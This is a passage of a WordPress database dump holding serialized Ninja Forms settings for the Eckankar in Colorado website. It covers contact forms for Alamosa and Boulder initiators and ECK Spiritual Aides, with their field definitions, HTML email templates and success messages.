Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";i:1;s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_89\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_89\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:51;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797572453\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"614\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_91\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_91\";}s:2:\"id\";i:53;}i:10;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797570022\";}s:2:\"id\";s:3:\"615\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:24\";s:5:\"label\";s:9:\"Save Form\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";}s:2:\"id\";i:17;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:24\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_83}\";s:13:\"email_subject\";s:33:\"Alamosa Initiators and ESAâs\";s:13:\"email_message\";s:3742:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_81},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the \"Alamosa Colorado Leadership Communications\" team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_81}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_82}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_83}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_84}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_85}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166999137}<br /><br /><br />\r\n <strong>MESSAGE:</strong> {field:textarea_89}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission will be forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:18;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:24\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:363:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n\n\n</div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:19;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:24\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Alamosa Area Initiators and ESA\'s\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3439:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Alamosa Initiators and ESAs </span>form submission.<br><br><br> </strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Alamosa Colorado Leadership Organization</em>.<br><br><br> <strong><br><br><br>The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_81} {field:lastname_82}</span> has submitted:</strong></p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_81}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_82}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_83}<br><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_84}</span><br><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_85}<br><br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166999137}</span></p><br><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_89}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:20;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:27:\"Alamosa Initiators and ESAs\";s:10:\"created_at\";s:19:\"2019-07-15 14:04:34\";s:10:\"form_title\";s:33:\"Alamosa Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 16:43:23\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"11\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:7:\"html_80\";i:1;s:10:\"textbox_81\";i:2;s:11:\"lastname_82\";i:3;s:8:\"email_83\";i:4;s:8:\"phone_84\";i:5;s:13:\"listselect_85\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166999137\";i:7;s:11:\"textarea_89\";i:8;s:18:\"html_1663797572453\";i:9;s:9:\"submit_91\";i:10;s:18:\"html_1663797570022\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(6,'a:7:{s:2:\"id\";i:6;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1248:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1253:\"<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:7:\"html_93\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_93\";}s:2:\"id\";i:54;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_94\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_94\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:55;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_95\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:9:\"Last 